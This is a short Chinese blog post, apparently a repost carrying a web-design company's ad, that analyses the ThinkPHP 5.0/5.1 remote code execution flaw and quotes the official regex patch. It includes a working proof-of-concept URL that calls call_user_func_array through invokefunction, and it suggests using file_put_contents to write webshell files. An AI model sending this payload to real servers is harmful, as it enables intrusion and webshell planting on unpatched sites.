這篇文章將為大家詳細講解有關thinkphp5.0和5.1的getshell漏洞示例分析,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。
大廠網(wǎng)站建設公司創(chuàng)新互聯(lián)建站,大廠網(wǎng)站設計制作,有大型網(wǎng)站制作公司豐富經(jīng)驗。已為大廠千余家提供企業(yè)網(wǎng)站建設服務。企業(yè)網(wǎng)站搭建\成都外貿(mào)網(wǎng)站建設要多少錢,請找那個售后服務好的大廠做網(wǎng)站的公司定做!之前網(wǎng)站被提權了,那時候網(wǎng)站才建沒幾天,應該不會有人故意為之,可能是批量掃描getshell的,為了方便我找的是開源系統(tǒng)thinkcmf建了博客,看著挺不錯的,因為thinkcmf用的是thinkphp5.0的框架開發(fā)的,我到thinkphp.cn上去看了一下,原來有一個提權漏洞。
libaray/think/app.php文件中模塊,控制器,方法使用的是/來區(qū)分開來。
然后并沒有對控制器進行過濾,導致可以構造執(zhí)行各種函數(shù)
我在本地建一個虛擬主機測試http://cmf.com
構造一個url訪問,可以直接打印出phpinfo:
http://cmf.com/index.php?s=portal/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
然后你可以把phpinfo換成其他函數(shù),比如使用file_put_content函數(shù)創(chuàng)建各種大馬小馬文件。
TP官方的修復5.0方法是:
在think\App
類的module
方法的獲取控制器的代碼后面加上
if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); }
我用的thinkcmf的版本是:ThinkCMF 5.0.180901
然后我看了一下thinkcmf的官網(wǎng)已經(jīng)更新到5.0.190111,新版也更新了tp5.0到新版本5.0.24了包含了安全更新,當然也沒有這個提權漏洞了。
關于“thinkphp5.0和5.1的getshell漏洞示例分析”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。